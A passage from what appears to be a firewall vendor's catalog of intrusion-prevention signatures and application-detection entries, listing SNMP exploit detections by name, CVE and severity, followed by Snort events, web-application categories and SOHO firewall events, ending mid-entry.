SNMP-TCP_Snmppd-Syslog-Format-String-System-Compromise

About this situation: Snmppd system compromise via format strings
Context: SNMP TCP Client Stream
Severity: 7
Tags: Unix, Any Hardware, Snmppd, CVE2005, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-Snmppd-Syslog-Format-String-System-Compromise
Description:
Back to top

SNMP-UDP_AwindInc-SNMP-Service-Command-Injection

About this situation: An attempt to exploit a vulnerability in AwindInc detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AwindInc, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: AwindInc-SNMP-Service-Command-Injection
Description:
Back to top

SNMP-UDP_Castle-Rock-Computing-SNMPc-Network-Manager-Community-String-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Castle Rock Computing SNMPc Network Manager
Context: SNMP UDP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Castle Rock Computing SNMPc Network Manager, CVE2008, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: SNMP-Castle-Rock-Computing-SNMPc-Network-Manager-Community-String-BOF
Description:
Back to top

SNMP-UDP_Cisco-Adaptive-Security-Appliance-SNMP-Buffer-Overflow

About this situation: An attempt to exploit a Cisco Adaptive Security Appliance SNMP Buffer Overflow vulnerability detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Cisco-Adaptive-Security-Appliance-SNMP-Buffer-Overflow
Description:
Back to top

SNMP-UDP_Cisco-ASA-SNMP-ExtraBacon-Exploit

About this situation: An attempt to exploit a vulnerability in Cisco Systems 7600 Series Router ASA Service Module detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Cisco-Adaptive-Security-Appliance-SNMP-Remote-Code-Execution-Vulnerability
Description:
Back to top

SNMP-UDP_Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6736

About this situation: An attempt to exploit a vulnerability in Cisco IOS detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2017, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6736
Description:
Back to top

SNMP-UDP_Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6742

About this situation: An attempt to exploit a vulnerability in Cisco IOS detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2017, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Vulnerability: Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6742
Description:
Back to top

SNMP-UDP_Cross-Site-Scripting-Via-SNMP-Trap

About this situation: A suspicious SNMP Trap message detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Netikus EventSentry, CVE2015, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Vulnerability: Opmantek-NMIS-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5642
Netikus-EventSentry-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5077
Castle-Rock-Computing-SNMPc-Cross-Site-Scripting-CVE-2016-5642
Ipswitch-WhatsUp-Gold-SNMP-Trap-Cross-Site-Scripting-CVE-2015-6005
Description:
Back to top

SNMP-UDP_CUPS-BOF

About this situation: Attempt to exploit buffer overflow in CUPS
Context: SNMP UDP Client Stream
Severity: 10
Tags: Unix, Any Hardware, Common UNIX Printing System, CVE2007, Unix not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SNMP-Common-Unix-Printing-System-ASN1-BOF
Description:
Back to top

SNMP-UDP_Default-Community-String-Accepted

About this situation: Default community string accepted by SNMP agent
Context: SNMP UDP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, SNMP Agent, CVE1999, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SNMP-Default-Community-String-Usage
Description:
Back to top

SNMP-UDP_Default-Community-String-Public-Accepted

About this situation: Default community string public accepted by SNMP agent
Context: SNMP UDP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, SNMP Agent, CVE1999, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-581-5211
Vulnerability: SNMP-Default-Community-String-Usage
Description:
Back to top

SNMP-UDP_Default-Community-String-Rejected

About this situation: Default community string rejected by SNMP agent
Context: SNMP UDP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, SNMP Agent, CVE1999, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SNMP-Default-Community-String-Usage
Description:
Back to top

SNMP-UDP_GetBulkRequest-With-Nonzero-Nonrepeaters-And-Large-Maxrepeaters-Value

About this situation: Potential exploit against the Microsoft SNMP Service Buffer Overflow
Context: SNMP UDP Client Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2006-12, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-143-2032
Last changed: sgpkg-ips-277-4219
Vulnerability: SNMP-Microsoft-SNMP-Service-Buffer-Overflow
Description:
Back to top

SNMP-UDP_GetBulkRequest-With-Nonzero-Nonrepeaters-And-Maxrepeaters-Values

About this situation: Potential exploit against the Microsoft SNMP Service Buffer Overflow
Context: SNMP UDP Client Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2006-12, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SNMP-Microsoft-SNMP-Service-Buffer-Overflow
Description:
Back to top

SNMP-UDP_Linux-Kernel-SNMP-NAT-Helper-SNMP-Trap-Decode-DoS

About this situation: Denial of service vulnerability in Linux kernel SNMP handling
Context: SNMP UDP Client Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2006, Linux not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-627-5211
Vulnerability: SNMP-Linux-Kernel-SNMP-NAT-Helper-SNMP-Trap-Decode-DoS
Description:
Back to top

SNMP-UDP_Malformed-Get

About this situation: A malformed get was seen
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

SNMP-UDP_Microsoft-SNMP-Service-Buffer-Overflow

About this situation: Microsoft SNMP Service Buffer Overflow
Context: SNMP UDP Client Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2006-12, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-87-1314
Last changed: sgpkg-ips-640-5211
Vulnerability: SNMP-Microsoft-SNMP-Service-Buffer-Overflow
Description:
Back to top

SNMP-UDP_Microsoft-Windows-SNMP-CVE-2018-0967-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1121-5242
Vulnerability: Microsoft-Windows-SNMP-CVE-2018-0967-Denial-Of-Service
Description:
Back to top

SNMP-UDP_Multiple-Vendor-Snmpv3-Hmac-Handling-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Net-SNMP detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Net-SNMP, CVE2008, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Multiple-Vendor-Snmpv3-Hmac-Handling-Authentication-Bypass
Description:
Back to top

SNMP-UDP_Negative-Request-Id

About this situation: A negative SNMP request ID detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Description:
Back to top

SNMP-UDP_Net-SNMP-Handle_ipdefaultttl-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Net-SNMP detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Net-SNMP, CVE2022, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1537-5242
Last changed: sgpkg-ips-1537-5242
Vulnerability: Net-SNMP-Handle_ipdefaultttl-Null-Pointer-Dereference
Description:
Back to top

SNMP-UDP_Net-SNMP-Handle_ipv6ipforwarding-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Net-SNMP detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Net-SNMP, CVE2022, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1550-5242
Vulnerability: Net-SNMP-Handle_ipv6ipforwarding-Null-Pointer-Dereference
Description:
Back to top

SNMP-UDP_Net-SNMP-Write-Access-SNMP-EXTEND-MIB-Arbitrary-Code-Execution

About this situation: An attempt to exploit a vulnerability in Net-SNMP detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Net-SNMP, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: Net-SNMP-Write-Access-SNMP-EXTEND-MIB-Arbitrary-Code-Execution
Description:
Back to top

SNMP-UDP_Nodemanager-SNMP-Trap-Buffer-Overflow

About this situation: SNMP trap buffer overflow exploit detected against NodeManager
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NodeManager Professional, CVE2005, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-640-5211
Vulnerability: SNMP-Nodemanager-SNMP-Trap-Buffer-Overflow
Description:
Back to top

SNMP-UDP_Rockwell-Automation-Micrologix-PLC-Default-Community-String-Usage

About this situation: Rockwell Automation MicroLogix PLC default SNMP community string detected
Context: SNMP UDP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Rockwell Automation MicroLogix PLC, CVE2016, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Rockwell-Automation-Micrologix-PLC-Default-Credentials-CVE-2016-5645
Description:
Back to top

SNMP-UDP_SNMP-Trap-Service-GET-Request-DoS

About this situation: A denial of service vulnerability in SNMP trap handling.
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SNMP Trap, MS2002, CVE2002, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: SNMP-Trap-Service-GET-Request-DoS
Description:
Back to top

SNMP-UDP_Squid-ASN.1-Header-Parsing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Web Proxy Cache detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Squid-ASN.1-Header-Parsing-Denial-Of-Service
Description:
Back to top

SNMP-UDP_Squid-Proxy-SNMP-Query-Rejection-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Vulnerability: Squid-Proxy-SNMP-Query-Rejection-Denial-Of-Service
Description:
Back to top

SNMP-UDP_Symantec-Firewall-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Symantec Firewall detected
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Gateway Security, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Symantec-Firewall-Multiple-Vulnerabilities
Description:
Back to top

SNMP-UDP_WINS-Delete-DoS

About this situation: Delete WINS database records via SNMP
Context: SNMP UDP Client Stream
Severity: 7
Tags: Windows NT 4.0, Any Hardware, CVE1999, Windows NT 4.0 not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: SNMP-Default-Community-String-WINS-DoS
Description:
Back to top

SNMP-UDP_Write-Attempt-Using-Default-Community-String

About this situation: SNMP write attempt using default community string
Context: SNMP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SNMP Agent, CVE1999, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SNMP-Default-Community-String-Usage
Description:
Back to top

Snort_Alert

About this situation: An alert was produced by a Snort rule
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: An alert was produced by a Snort rule.
Back to top

Snort_Drop

About this situation: Traffic has been dropped by a Snort rule
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: Traffic has been dropped by a Snort rule.
Back to top

Snort_Drop-Silent

About this situation: Traffic has been dropped by a Snort rule without a Snort alert
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: Traffic has been dropped by a Snort rule without a Snort alert.
Back to top

Snort_Message

About this situation: A message sent by Snort
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: A message sent by Snort.
Back to top

Snort_Reject

About this situation: Traffic has been rejected by a Snort rule
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: Traffic has been rejected by a Snort rule.
Back to top

Snort_Reject-Silent

About this situation: Traffic has been rejected by a Snort rule without a Snort alert
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: Traffic has been rejected by a Snort rule, and there is no Snort alert defined.
Back to top

Snort_Timeout

About this situation: A timeout while forwarding packets to Snort
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: A timeout occurred while forwarding packets to Snort.
Back to top

SNPP

About this situation: SNPP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-759-5211
Description: The SNPP protocol as defined in RFC 1861 is used to deliver wireless messages from a user client application to a subscriber. The protocol uses a client server architecture.
Back to top

So-Net-Blog

About this situation: So-net blog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

So-Net-Webmail

About this situation: So-net Webmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: This site is provides services for web mail, news update, weather report and many more.
Back to top

Soasta-mPulse

About this situation: mPulse usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Soasta's mPulse is an online statistics collection service.
Back to top

Soccer-Manager

About this situation: Soccer Manager usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Social and Affiliation Organizations

About this situation: Sites sponsored by or that support or offer information about organizations devoted chiefly to socializing or common interests other than philanthropy or professional advancement.
Context: URL Application Context
Severity: 1
Tags: Social Organizations, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or that support or offer information about organizations devoted chiefly to socializing or common interests other than philanthropy or professional advancement.
Back to top

Social Networking

About this situation: Sites of web communities that provide users with means for expression and interaction.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites of web communities that provide users with means for expression and interaction.
Back to top

Social Organizations

About this situation: The parent category that contains the following categories: Professional and Worker Organizations, Service and Philanthropic Organizations and Social and Affiliation Organizations.
Context: URL Application Context
Severity: 1
Tags: Social Organizations, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Professional and Worker Organizations, Service and Philanthropic Organizations and Social and Affiliation Organizations.
Back to top

Social Web - Facebook

About this situation: Category used to manage the Facebook domain. Contains: Facebook Apps, Chat, Commenting, Events, Friends, Games, Groups, Mail, Photo Upload, Posting, Questions and Video Upload.
Context: URL Application Context
Severity: 1
Tags: Social Web - Facebook, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the Facebook domain. Contains: Facebook Apps, Chat, Commenting, Events, Friends, Games, Groups, Mail, Photo Upload, Posting, Questions and Video Upload.
Back to top

Social Web - LinkedIn

About this situation: Category used to manage the LinkedIn domain. Contains: LinkedIn Connections, Jobs, Mail and Updates.
Context: URL Application Context
Severity: 1
Tags: Social Web - LinkedIn, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the LinkedIn domain. Contains: LinkedIn Connections, Jobs, Mail and Updates.
Back to top

Social Web - Twitter

About this situation: Category used to manage the Twitter domain. Contains: Twitter Follow, Mail and Posting
Context: URL Application Context
Severity: 1
Tags: Social Web - Twitter, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the Twitter domain. Contains: Twitter Follow, Mail and Posting
Back to top

Social Web - Various

About this situation: Category used to manage various domain controls: Blog Commenting, Posting and Classifieds Posting.
Context: URL Application Context
Severity: 1
Tags: Social Web - Various, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage various domain controls: Blog Commenting, Posting and Classifieds Posting.
Back to top

Social Web - YouTube

About this situation: Category used to manage the YouTube domain. Contains: YouTube Commenting, Sharing and Video Upload.
Context: URL Application Context
Severity: 1
Tags: Social Web - YouTube, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the YouTube domain. Contains: YouTube Commenting, Sharing and Video Upload.
Back to top

Social-Networking

About this situation: Application Social-Networking detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Social Networking family connections provides ability Create a private social networking site for family, friends or other small groups.
Back to top

Social-Security-Administration

About this situation: Application Social-Security-Administration detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Social Security Administration is an independent agencies in government.
Back to top

Socialcam

About this situation: Socialcam usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application allows users to capture and share videos online, on other social networks, and on mobile devices. Source: Wikipedia
Back to top

Socialcast

About this situation: Application Socialcast detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Socialcast is enterprise social networking platform that connects people to the knowledge, ideas and resources they need to work more effectively.
Back to top

SocialChorus

About this situation: Application SocialChorus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SocialChorus is a daily news app for work. Marketing and communications leaders rely on app to keep employees connected with their enterprise and their networks.
Back to top

SocialEngine

About this situation: Application SocialEngine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SocialEngine PHP is a PHP-based white-label social networking service platform, that provides features similar to a social network on a user's website. Main features include administration of small-to-mid scale social networks, some customization abilities, unencrypted code.
Back to top

socialflow

About this situation: Application socialflow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SocialFlow increases distribution of owned and earned content by analyzing user behavior and optimizing each post based on real-time data.
Back to top

SocialOomph

About this situation: Application SocialOomph detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SocialOomph.com is a service that provides productivity enhancement services for social media users.
Back to top

SocialShield

About this situation: Application SocialShield detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Avira Social Network Protection offers state of the art online parenting tools to monitor kids internet safety on sites like Facebook, Twitter and Google
Back to top

Socialtext

About this situation: Socialtext usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Socialtext Incorporated is a company based in Palo Alto, California that produces enterprise social software. Its integrated suite of web-based social software applications includes microblogging, user profile, directories, groups, personal dashboards using OpenSocial widgets, shared spreadsheet, wiki, and weblog collaboration tools, and mobile apps.
Back to top

Societe-Generale-de-Surveillance

About this situation: Application Societe-Generale-de-Surveillance detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SGS is a multinational company which provides inspection, verification, testing and certification services. The core services offered by SGS include the inspection and verification of the quantity, weight and quality of traded goods, the testing of product quality and performance against various health, safety and regulatory standards, and to make sure that products, systems or services meet the requirements of standards set by governments, standardization bodies or by SGS customers.
Back to top

Society and Lifestyles

About this situation: Sites that provide information about matters of daily life, excluding entertainment, health, hobbies, jobs, sex and sports.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about matters of daily life, excluding entertainment, health, hobbies, jobs, sex and sports.
Back to top

Sociomantic

About this situation: Application Sociomantic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sociomantic- is a dunnhumby company, helps the world
Back to top

Socks2HTTP

About this situation: Socks2HTTP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-464-5211
Last changed: sgpkg-ips-595-5211
Description: Socks2HTTP is a program that implements SOCKS traffic tunnelling over HTTP to bypass firewall or proxy restrictions.
Back to top

SOCKS4

About this situation: SOCKS4 traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: SOCKS4 usage.
Back to top

SOCKS5

About this situation: SOCKS5 traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: SOCKS5 usage.
Back to top

Sococo

About this situation: Application Sococo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sococo is the social communications service company. Virtual office environment enabling teams to solve problems more quickly, efficiently, and cost effectively.
Back to top

Soffront-CRM

About this situation: Application Soffront-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Soffront offers a complete CRM solution for sales marketing and customer service.
Back to top

Sofon-Guided-Selling

About this situation: Application Sofon-Guided-Selling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sofon Guided Selling is solution for needs analysis, product selection, product sales configuration, calculation, pricing, visualization and generation of proposals, quotations, contracts and orders. Connected with many ERP's.
Back to top

SoftExpert

About this situation: Application SoftExpert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SoftExpert HDM is a comprehensive web-based human development management solution for competency mapping, training and development, and performance review, aiming to help organizations better plan, select, deploy, develop, measure, and reward the workforce.
Back to top

SoftLayer

About this situation: Application SoftLayer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SoftLayer is a cloud-based infrastructure as a service provider integrating physical and virtual devices of enterprises.
Back to top

Software-AG

About this situation: Application Software-AG detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Software AG is a provider of enterprise management software.
Back to top

SoftXml

About this situation: Application SoftXml detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SoftXml is a web development company that offers products and services that specialized in product and application development on the XML platform for the online community.
Back to top

SOHO Firewall: Configuration event

About this situation: SOHO Firewalls: Configuration event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged a Configuration event.
Back to top

SOHO Firewall: DHCP event

About this situation: SOHO Firewalls: DHCP event.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: SOHO Firewall has logged a DHCP event.
Back to top

SOHO Firewall: Interface dialup

About this situation: SOHO Firewalls: Interface dialup.
Context: SOHO Firewall Situations
Severity: 2
Tags: SMC
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description: The given interface is dynamically dialed up, because a packet has to be routed to it.
Back to top

SOHO Firewall: IP Accounting

About this situation: SOHO Firewalls: IP accounting message.
Context: SOHO Firewall Situations
